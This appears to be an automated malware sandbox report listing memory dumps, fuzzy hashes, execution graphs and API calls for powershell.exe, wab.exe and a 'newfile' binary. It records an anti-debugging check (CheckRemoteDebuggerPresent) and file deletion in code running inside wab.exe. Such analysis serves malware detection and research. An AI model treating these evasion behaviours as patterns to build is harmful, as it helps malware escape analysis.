                                                                        • Instruction ID: 8e03c40a14bd3ab50035f30539dbd1896208298b7adfbc71c0b8b5c404ee54fe
                                                                        • Opcode Fuzzy Hash: 6d7e4f6734f8f4dd9aa7e76a14636350c2afa3e62620155959d810bc11c4c4f7
                                                                        • Instruction Fuzzy Hash: 7B01F272604341DAE7204E29ED80B67BF98EF41364F18C12EED480F242C6B8E842DAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fc08fc4a38cf775995496d1f7bec24387183c767ce31d42837c67243c8d29aee
                                                                        • Instruction ID: 5fcc5533928a224af5508ede403bbece333435d04294107f1b4311e623c7fb06
                                                                        • Opcode Fuzzy Hash: fc08fc4a38cf775995496d1f7bec24387183c767ce31d42837c67243c8d29aee
                                                                        • Instruction Fuzzy Hash: C6015E7250E3C09FE7128B259D94B52BFB4EF43224F19C1DBD9888F1A3C2699849C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 568b2f704f12e61be927641c5dadfc6a8afab589e7f179a88b2f0750306b36a9
                                                                        • Instruction ID: b9bcd870e69622201f1bd2a3e7d49c66d7f9e96446940c8d5f86f562eddadd5e
                                                                        • Opcode Fuzzy Hash: 568b2f704f12e61be927641c5dadfc6a8afab589e7f179a88b2f0750306b36a9
                                                                        • Instruction Fuzzy Hash: DDF08235B05244CFC701CBA8DD909AEFB76EFC9204B14C49BC44597362C635AC06CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82ef4519500001b8d1cb82d5509916d0e18cb5b6207a9b36df4e65e9c1442ef5
                                                                        • Instruction ID: 761d0e0d6e50ddc3f5a81bc40b3b413aea245fd87ef7f418ba5ed6f671e1ab02
                                                                        • Opcode Fuzzy Hash: 82ef4519500001b8d1cb82d5509916d0e18cb5b6207a9b36df4e65e9c1442ef5
                                                                        • Instruction Fuzzy Hash: 47E0ED71609742CFD3168A14CD64A10FBB2BF8A315F1DC0DA91498F1D6D736ED46CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1643b9242ca39005eae2149683d5a08ca9576a3bb198eb652ab1faae5bf3bcc3
                                                                        • Instruction ID: ed8975d41a73b89207147e5dac7241a79e9d2100c279658b3f63800954ad13e5
                                                                        • Opcode Fuzzy Hash: 1643b9242ca39005eae2149683d5a08ca9576a3bb198eb652ab1faae5bf3bcc3
                                                                        • Instruction Fuzzy Hash: C12102B2604241AFDB04DF14D9C0B2AFBA7FBD4724F20857DD94A4B241C77AE406CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        • Execution Coverage: 6.9%
                                                                        • Dynamic/Decrypted Code Coverage: 100%
                                                                        • Signature Coverage: 50%
                                                                        • Total number of Nodes: 6
                                                                        • Total number of Limit Nodes: 0
                                                                        Execution graph nodes (node id: address, API call) and edges:
                                                                        • 16027: a5ad70 -> 16028: a5adb6 (DeleteFileW) -> 16030: a5adef
                                                                        • 16031: a570b8 -> 16032: a570fc (CheckRemoteDebuggerPresent) -> 16033: a5713e

                                                                        Control-flow Graph

                                                                        Basic blocks (node id: address range, API call), marked Executed / Not Executed in the graph:
                                                                        • 225: a570b8-a5713c (CheckRemoteDebuggerPresent)
                                                                        • 227: a57145-a57180
                                                                        • 228: a5713e-a57144
                                                                        Edges: 225->227, 225->228, 228->227
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00A5712F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 93e8b1c2d8897745a6d0d2bff0dae281fdc03d97668eeb58b14d95e77da4a20f
                                                                        • Instruction ID: 442f2aab88f0b24e51e1ee69d954b3cc09d7be76f6691746b8e75552308efe13
                                                                        • Opcode Fuzzy Hash: 93e8b1c2d8897745a6d0d2bff0dae281fdc03d97668eeb58b14d95e77da4a20f
                                                                        • Instruction Fuzzy Hash: 9A2128B19006598FDB10CFAAD884BEEBBF4BF49320F14845AE859B7250D778A944CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Basic blocks (node id: address range, API call), marked Executed / Not Executed in the graph:
                                                                        • 219: a570b0-a5713c (CheckRemoteDebuggerPresent)
                                                                        • 221: a57145-a57180
                                                                        • 222: a5713e-a57144
                                                                        Edges: 219->221, 219->222, 222->221
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00A5712F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 22beed14c721828e3936b5cef151b685539e4802df05ebb7e3a4d3eb712e7ad7
                                                                        • Instruction ID: 627b572b7ce03b4c3939988d70e4ea5fff1cefc3e2702ba1173408ffa65eff9b
                                                                        • Opcode Fuzzy Hash: 22beed14c721828e3936b5cef151b685539e4802df05ebb7e3a4d3eb712e7ad7
                                                                        • Instruction Fuzzy Hash: 532139B18006598FCB14CFAAD4447EEBBF4FF49320F14845AE858B7250D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Basic blocks (node id: address range, API call), marked Executed / Not Executed in the graph:
                                                                        • 231: a5ad69-a5adba
                                                                        • 233: a5adc2-a5aded (DeleteFileW)
                                                                        • 234: a5adbc-a5adbf
                                                                        • 235: a5adf6-a5ae1e
                                                                        • 236: a5adef-a5adf5
                                                                        Edges: 231->233, 231->234, 233->235, 233->236, 234->233, 236->235
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00A5ADE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 46c695df02c32c3c337b2764eb328f61f072deecf3824d6cc6248055b3b30917
                                                                        • Instruction ID: 3191ce20bf6f848c3a12edada43abf7af503f365fcf33ed682bff4a44e155ae2
                                                                        • Opcode Fuzzy Hash: 46c695df02c32c3c337b2764eb328f61f072deecf3824d6cc6248055b3b30917
                                                                        • Instruction Fuzzy Hash: ED2124B6D0065A9FCB10DF9AC5447DEFBB0BF48721F10862AD818B7640D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Basic blocks (node id: address range, API call), marked Executed / Not Executed in the graph:
                                                                        • 239: a5ad70-a5adba
                                                                        • 241: a5adc2-a5aded (DeleteFileW)
                                                                        • 242: a5adbc-a5adbf
                                                                        • 243: a5adf6-a5ae1e
                                                                        • 244: a5adef-a5adf5
                                                                        Edges: 239->241, 239->242, 241->243, 241->244, 242->241, 244->243
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00A5ADE0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3346172513.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a50000_wab.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: b933feb988e960ae1ce4385ed0c311f5bffda82e5c3e376b929a5c649c61a639
                                                                        • Instruction ID: 08a7e875e214929704bcf79002ab0c9973f8bb34c480b51f4ed816f54c995862
                                                                        • Opcode Fuzzy Hash: b933feb988e960ae1ce4385ed0c311f5bffda82e5c3e376b929a5c649c61a639
                                                                        • Instruction Fuzzy Hash: BA1124B2D0065A9BCB10DF9AC54479EFBB4BF48720F10862AD918A7640D778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3345790120.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a2d000_wab.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca5891e6e6fe84d837179383d4922208fd85fdf45c24fae030f06df2a2f0b0a1
                                                                        • Instruction ID: 2e4f012e1dc913b0cf32699dec0fee438e553852ca55b6c5ed63ada723b407b2
                                                                        • Opcode Fuzzy Hash: ca5891e6e6fe84d837179383d4922208fd85fdf45c24fae030f06df2a2f0b0a1
                                                                        • Instruction Fuzzy Hash: 0C212571508204EFCB14DF18E9C0B26BB61FB84314F20C57DD90A4B267C776D846CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3345790120.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_a2d000_wab.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                        • Instruction ID: 41a0e56d087f2ca597104f26e180aef8f9d12162441148260ad6f81eee6136f7
                                                                        • Opcode Fuzzy Hash: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                        • Instruction Fuzzy Hash: CA119D75508284DFCB15CF14E5C4B15FBA1FB84318F28C6AAD84A4B667C33AD85ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:27.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:28.4%
                                                                        Total number of Nodes:211
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 870 3831bf _XcptFilter 648 383030 665 383675 648->665 650 383035 651 383046 GetStartupInfoW 650->651 652 383063 651->652 653 383078 652->653 654 38307f Sleep 652->654 655 383097 _amsg_exit 653->655 657 3830a1 653->657 654->652 655->657 656 3830e3 _initterm 661 3830fe __IsNonwritableInCurrentImage 656->661 657->656 658 3830c4 657->658 657->661 659 3831a6 _ismbblead 659->661 661->659 662 3831ee 661->662 663 38318e exit 661->663 670 381c5c 661->670 662->658 664 3831f7 _cexit 662->664 663->661 664->658 666 38369a 665->666 667 38369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 665->667 666->667 668 383702 666->668 669 3836ed 667->669 668->650 669->668 728 3837f0 670->728 674 381d01 HeapSetInformation 675 381d20 674->675 683 381d18 674->683 732 3829ab CommandLineToArgvW 675->732 680 381e0e 746 381b83 memset 680->746 782 381ae4 683->782 684 381e2f 752 3825d3 memset memset CommandLineToArgvW 684->752 685 381e22 GetLastError 685->683 690 381ae4 2 API calls 691 38259a 690->691 786 3832b0 691->786 694 3825a9 694->661 695 381eee 696 381ef2 EventUnregister 695->696 697 381f6d 696->697 698 381f1f memset LoadStringW MessageBoxW 696->698 700 381f79 GetProcAddress 697->700 704 38202e 697->704 698->683 700->683 701 382036 GetProcAddress 701->683 721 38204e 701->721 704->701 705 38208a 704->705 705->683 706 38211c GetProcAddress 705->706 706->683 707 382136 706->707 708 38218c memset 707->708 710 382225 707->710 712 3821a9 LoadStringW 708->712 711 382384 710->711 792 381b21 710->792 713 38242a 711->713 714 38238d GetProcAddress 711->714 712->710 716 3824d0 713->716 717 382433 GetProcAddress 713->717 714->683 722 3823a5 714->722 718 3824d8 GetProcAddress 716->718 719 3824f0 716->719 717->683 723 38244b 717->723 718->683 718->719 719->683 720 382525 GetProcAddress 719->720 720->683 720->721 721->683 722->683 724 3823e2 memset LoadStringW 
722->724 723->683 726 382488 memset LoadStringW 723->726 724->713 726->716 727 38233c memset LoadStringW 727->711 729 381c6b memset GetCommandLineW 728->729 730 381ab0 729->730 731 381acb 730->731 731->674 731->731 733 3829cc 732->733 734 381d27 732->734 735 3829db LocalFree 733->735 738 381bf4 734->738 735->734 737 3829ec 735->737 736 382a08 RegisterApplicationRestart 736->734 737->736 796 3828a4 memset 738->796 741 381c28 PathAppendW 742 381c4d 741->742 744 381c3e LoadLibraryW 741->744 743 3832b0 4 API calls 742->743 745 381c5a 6 API calls 743->745 744->742 745->680 745->683 747 3828a4 10 API calls 746->747 748 381bbb LoadLibraryW 747->748 750 3832b0 4 API calls 748->750 751 381bf2 750->751 751->684 751->685 753 382888 752->753 754 382661 752->754 755 3832b0 4 API calls 753->755 756 38287d LocalFree 754->756 757 382683 StrCmpNIW 754->757 764 382676 754->764 758 381e43 755->758 756->753 759 3826f0 757->759 761 3826a0 757->761 758->683 777 38193a EventRegister 758->777 762 382741 759->762 763 382709 PathFindExtensionW 759->763 760 382761 StrCmpIW 760->762 765 382785 760->765 761->764 808 381b57 761->808 762->760 762->764 766 38271e StrCmpIW 763->766 764->756 765->764 769 3827c0 765->769 766->762 767 382730 766->767 767->764 767->766 770 3827d3 GetFileAttributesW 769->770 771 3827e5 770->771 775 382833 770->775 772 3827ee PathRemoveFileSpecW 771->772 773 382811 771->773 772->773 774 3827ff GetFileAttributesW 772->774 773->764 774->773 774->775 775->773 812 382b60 775->812 778 381998 EventSetInformation 777->778 779 38198b 777->779 778->779 780 3832b0 4 API calls 779->780 781 3819c5 780->781 781->695 781->696 791 3819c7 EventWriteTransfer 781->791 783 381af2 782->783 784 381b16 783->784 785 381b06 GetProcessHeap HeapFree 783->785 784->690 785->784 787 3832b8 786->787 788 3832bb 786->788 787->694 826 3832c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 788->826 790 3833f6 790->694 791->695 793 381b2e 792->793 794 381b4d 
792->794 827 382c36 793->827 794->683 794->727 797 38299d 796->797 798 3828ee RegOpenKeyExW 796->798 799 3832b0 4 API calls 797->799 800 382989 798->800 801 382914 RegQueryValueExW 798->801 803 381c17 PathRemoveFileSpecW 799->803 800->797 802 382991 RegCloseKey 800->802 801->800 804 382949 801->804 802->797 803->741 803->742 805 382958 ExpandEnvironmentStringsW 804->805 806 38296d GetFileAttributesW 804->806 805->800 806->800 807 382979 806->807 807->800 809 381b63 808->809 810 382b60 6 API calls 809->810 811 381b7b 810->811 811->764 813 382bc7 812->813 814 382b74 812->814 813->773 814->813 818 382a7e 814->818 817 382baa memcpy 817->813 819 382a95 818->819 820 382a8e 818->820 819->820 821 382ac9 GetProcessHeap HeapAlloc 819->821 820->813 820->817 821->820 822 382adf 821->822 823 382ae5 memcpy 822->823 824 382aff 822->824 823->824 824->820 824->824 825 382b33 GetProcessHeap HeapFree 824->825 825->820 826->790 828 382ce8 827->828 829 382c61 827->829 830 3832b0 4 API calls 828->830 832 382a7e 5 API calls 829->832 831 382cf7 830->831 831->794 833 382c86 832->833 838 382cd4 833->838 839 382cfb 833->839 834 381ae4 2 API calls 834->828 838->834 840 382cae 839->840 841 382d0a 839->841 840->838 847 382bd5 840->847 841->840 853 382ef8 841->853 844 382d44 memset 844->840 846 382d4b memset 846->840 848 382c28 847->848 849 382be5 847->849 848->838 849->848 850 382a7e 5 API calls 849->850 851 382c0b 850->851 851->848 852 382c11 memcpy 851->852 852->848 854 382f07 853->854 856 382d2b 854->856 857 382e3f 854->857 856->844 856->846 858 382e83 857->858 859 382e8f 858->859 860 382e9f LocalAlloc 858->860 859->856 860->859 861 382eaf 860->861 862 382ee8 LocalFree 861->862 865 382deb 861->865 862->859 864 382eda 864->862 866 382df8 865->866 868 382e1c 865->868 867 382e06 IsDBCSLeadByte 866->867 866->868 867->866 867->868 868->864 871 3825b0 872 3825be DefWindowProcW 871->872 873 3825c5 PostQuitMessage 871->873 872->873 874 383790 _except_handler4_common 875 383450 
SetUnhandledExceptionFilter 881 383400 882 38343d 881->882 883 383412 881->883 883->882 884 383437 ?terminate@ 883->884 884->882 885 382f80 886 382f85 885->886 894 3834d8 GetModuleHandleW 886->894 888 382f91 __set_app_type __p__fmode __p__commode 889 382fc9 888->889 890 382fde 889->890 891 382fd2 __setusermatherr 889->891 896 38370d _controlfp 890->896 891->890 893 382fe3 895 3834e9 894->895 895->888 896->893 869 383001 __getmainargs 897 3837c2 898 3837d3 897->898 901 382f51 ResolveDelayLoadedAPI 898->901 900 3837e0 901->900 876 3831d3 877 3831ee 876->877 878 3831e7 _exit 876->878 879 3831f7 _cexit 877->879 880 383202 877->880 878->877 879->880

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_0038193A 6 Function_003832B0 0->6 1 Function_003831BF 2 Function_00382E3F 33 Function_00382D7F 2->33 37 Function_00382DEB 2->37 3 Function_003825B0 4 Function_003818B0 5 Function_00383530 53 Function_003832C0 6->53 7 Function_00381AB0 8 Function_00383030 12 Function_00383728 8->12 18 Function_00383219 8->18 23 Function_00383580 8->23 36 Function_00383675 8->36 44 Function_00381C5C 8->44 9 Function_003834B1 10 Function_003834B5 11 Function_00382C36 11->6 11->7 31 Function_00382CFB 11->31 32 Function_00382A7E 11->32 41 Function_00381AE4 11->41 49 Function_00382BD5 11->49 13 Function_003829AB 15 Function_00382A21 13->15 14 Function_00383520 16 Function_00381B21 16->11 17 Function_003828A4 17->6 40 Function_00381A60 17->40 19 Function_0038361E 20 Function_00383790 21 Function_0038360B 22 Function_0038370D 23->5 52 Function_00383640 23->52 24 Function_00383400 25 Function_00381B80 26 Function_00382F80 26->14 26->22 43 Function_003834D8 26->43 51 Function_0038324A 26->51 27 Function_00383001 28 Function_00381B83 28->6 28->17 29 Function_00382EF8 29->2 30 Function_003813F8 31->29 34 Function_003837F0 35 Function_00381BF4 35->6 35->17 38 Function_0038376D 39 Function_00382B60 39->32 42 Function_00383464 42->12 43->42 44->0 44->6 44->7 44->13 44->16 44->28 44->34 44->35 44->41 47 Function_003825D3 44->47 55 Function_003819C7 44->55 45 Function_00383450 46 Function_00382F51 47->6 47->39 47->40 50 Function_00381B57 47->50 48 Function_003831D3 49->32 50->39 54 Function_003837C2 54->46

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 381c5c-381d16 call 3837f0 memset GetCommandLineW call 381ab0 HeapSetInformation 5 381d18-381d1b 0->5 6 381d20-381e08 call 3829ab call 381bf4 LoadStringW LoadIconW LoadCursorW GetStockObject RegisterClassW CreateWindowExW 0->6 7 381faf 5->7 6->7 20 381e0e-381e20 call 381b83 6->20 10 381fb1-381fb9 7->10 12 381fbb-381fd5 10->12 13 381fde-381fe6 10->13 12->13 31 381fd7-381fdc 12->31 14 381fe8-382004 13->14 15 38200d-382014 13->15 14->15 38 382006-38200b 14->38 18 38201a 15->18 19 382560 15->19 28 382021-382029 18->28 21 382562-382569 19->21 29 381e2f-381e45 call 3825d3 20->29 30 381e22 GetLastError 20->30 25 382578-3825aa call 381ae4 * 2 call 3832b0 21->25 26 38256b 21->26 35 382572 26->35 28->21 29->7 41 381e4b-381e62 call 38193a 29->41 34 381e28-381e2a 30->34 31->13 34->7 35->25 38->15 47 381e68-381e76 41->47 48 381ef0 41->48 49 381ef2-381f1d EventUnregister 47->49 50 381e78-381e88 47->50 48->49 51 381f6d-381f73 49->51 52 381f1f-381f62 memset LoadStringW MessageBoxW 49->52 50->49 53 381e8a-381e8c 50->53 55 381f79-381f8b GetProcAddress 51->55 56 38202e-382034 51->56 54 381f68-381f6b 52->54 53->49 57 381e8e-381eee call 3819c7 53->57 54->10 60 381fac-381fae 55->60 61 381f8d-381f95 55->61 58 38206a-382070 56->58 59 382036 56->59 57->49 64 382072-382074 58->64 65 382076-38207c 58->65 63 382038-382048 GetProcAddress 59->63 60->7 76 381f99-381f9b 61->76 63->60 67 38204e-38205c 63->67 64->63 69 38207e-382080 65->69 70 382082-382084 65->70 89 38205e-382063 67->89 90 382065 67->90 69->63 71 38208a-382098 70->71 72 382086-382088 70->72 73 38209a-3820a1 71->73 74 3820b3-3820b9 71->74 72->63 77 3820ab-3820b1 73->77 78 3820a3-3820a9 73->78 79 3820bb-3820c2 74->79 80 3820d4-3820da 74->80 81 381f9d-381fa2 76->81 82 381fa4-381fa6 76->82 83 38210f-382116 77->83 78->83 84 3820cc-3820d2 79->84 85 3820c4-3820ca 79->85 87 3820dc-3820e3 80->87 88 3820f5-3820fd 80->88 81->82 82->34 82->60 83->54 94 
38211c-382130 GetProcAddress 83->94 84->83 85->83 91 3820ed-3820f3 87->91 92 3820e5-3820eb 87->92 88->83 93 3820ff-382109 88->93 89->90 90->60 91->83 92->83 93->83 94->54 95 382136-382179 94->95 98 38217b-382180 95->98 99 382182-382186 95->99 98->99 100 38218c-3821a7 memset 99->100 101 382225-382228 99->101 104 3821a9-3821af 100->104 105 3821ec 100->105 102 38222a-382247 101->102 103 382251-382254 101->103 123 38224a 102->123 109 382281-382284 103->109 110 382256-38227f 103->110 107 3821b1-3821b7 104->107 108 3821e5-3821ea 104->108 106 3821f1-38221a LoadStringW 105->106 106->101 114 3821b9-3821bf 107->114 115 3821de-3821e3 107->115 108->106 111 382286-382291 109->111 112 3822c7-3822ca 109->112 110->123 116 382299-3822c5 111->116 117 382293 111->117 118 3822d0-3822e4 call 381b21 112->118 119 382384-382387 112->119 120 3821c1-3821d5 114->120 121 3821d7-3821dc 114->121 115->106 116->123 117->116 118->54 136 3822ea-3822f5 118->136 124 38242a-38242d 119->124 125 38238d-38239f GetProcAddress 119->125 120->106 121->106 123->103 128 3824d0-3824d6 124->128 129 382433-382445 GetProcAddress 124->129 125->60 130 3823a5-3823c6 125->130 133 3824d8-3824ea GetProcAddress 128->133 134 382519-38251f 128->134 129->60 135 38244b-38246c 129->135 150 3823c8-3823cd 130->150 151 3823cf-3823d1 130->151 133->60 137 3824f0-382514 133->137 134->54 139 382525-382537 GetProcAddress 134->139 155 38246e-382473 135->155 156 382475-382477 135->156 141 3822fd-382320 136->141 142 3822f7 136->142 137->134 139->60 144 38253d-38255b 139->144 158 382329-38232b 141->158 159 382322-382327 141->159 142->141 144->19 150->151 151->60 152 3823d7-3823dc 151->152 152->60 157 3823e2-38241f memset LoadStringW 152->157 155->156 156->60 160 38247d-382482 156->160 157->124 158->60 162 382331-382336 158->162 159->158 160->60 163 382488-3824c5 memset LoadStringW 160->163 162->60 164 38233c-382379 memset LoadStringW 162->164 163->128 164->119
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00381CC6
                                                                        • GetCommandLineW.KERNEL32 ref: 00381CCE
                                                                        • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00381D0E
                                                                        • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00381D49
                                                                        • LoadIconW.USER32 ref: 00381D84
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00381D96
                                                                        • GetStockObject.GDI32(00000000), ref: 00381DA3
                                                                        • RegisterClassW.USER32(00000003), ref: 00381DCD
                                                                        • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00381DF8
                                                                        • GetLastError.KERNEL32 ref: 00381E22
                                                                        • FreeLibrary.KERNELBASE(?), ref: 0038201B
                                                                        • FreeLibrary.KERNELBASE(?), ref: 0038256C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2713661988.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2713553787.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000385000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.0000000000387000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 0000000C.00000002.2713692223.000000000039D000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_380000_newfile.jbxd
                                                                        Similarity
                                                                        • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                                                        • String ID: $API Entered$Contacts Viewer$WABOpen$#v
                                                                        • API String ID: 328653217-2582680833
                                                                        • Opcode ID: daf847ed8f1ca2d70e768f9ad9619f18c7b1ad52fde155288f01464ca67bd2d4
                                                                        • Instruction ID: f120a445826759c64f630387bfe56aef4e280ec46f46e96a381ec76ea9f8d9fe
                                                                        • Opcode Fuzzy Hash: daf847ed8f1ca2d70e768f9ad9619f18c7b1ad52fde155288f01464ca67bd2d4
                                                                        • Instruction Fuzzy Hash: AB32D5B59007199FDB22AB54DC88BEAB7BDFF84700F1501E9E909A72A0DB749D81CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 165 383030-383061 call 383675 call 383728 GetStartupInfoW 171 383063-383072 165->171 172 38308c-38308e 171->172 173 383074-383076 171->173 176 38308f-383095 172->176 174 383078-38307d 173->174 175 38307f-38308a Sleep 173->175 174->176 175->171 177 3830a1-3830a7 176->177 178 383097-38309f _amsg_exit 176->178 180 3830a9-3830c2 call 383219 177->180 181 3830d5 177->181 179 3830db-3830e1 178->179 183 3830fe-383100 179->183 184 3830e3-3830f4 _initterm 179->184 180->179 190 3830c4-3830d0 180->190 181->179 185 38310b-383112 183->185 186 383102-383109 183->186 184->183 188 383114-383121 call 383580 185->188 189 383137-383141 185->189 186->185 188->189 197 383123-383135 188->197 192 383144-383149 189->192 193 383209-383218 190->193 195 38314b-38314d 192->195 196 383195-383198 192->196 200 38314f-383151 195->200 201 383164-383168 195->201 198 38319a-3831a3 196->198 199 3831a6-3831b3 _ismbblead 196->199 197->189 198->199 204 3831b9-3831bd 199->204 205 3831b5-3831b6 199->205 200->196 206 383153-383155 200->206 202 38316a-38316e 201->202 203 383170-383172 201->203 207 383173-38318c call 381c5c 202->207 203->207 204->192 205->204 206->201 209 383157-38315a 206->209 213 3831ee-3831f5 207->213 214 38318e-38318f exit 207->214 209->201 210 38315c-383162 209->210 210->206 215 383202 213->215 216 3831f7-3831fd _cexit 213->216 214->196 215->193 216->215
                                                                        APIs
                                                                          • Part of subcall function 00383675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003836A2
                                                                          • Part of subcall function 00383675: GetCurrentProcessId.KERNEL32 ref: 003836B1
                                                                          • Part of subcall function 00383675: GetCurrentThreadId.KERNEL32 ref: 003836BA
                                                                          • Part of subcall function 00383675: GetTickCount.KERNEL32 ref: 003836C3
                                                                          • Part of subcall function 00383675: QueryPerformanceCounter.KERNEL32(?), ref: 003836D8
                                                                        • GetStartupInfoW.KERNEL32(?,00383838,00000058), ref: 0038304F
                                                                        • Sleep.KERNEL32(000003E8), ref: 00383084
                                                                        • _amsg_exit.MSVCRT ref: 00383099
                                                                        • _initterm.MSVCRT ref: 003830ED
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00383119
                                                                        • exit.KERNELBASE ref: 0038318F
                                                                        • _ismbblead.MSVCRT ref: 003831AA
                                                                        Memory Dump Source
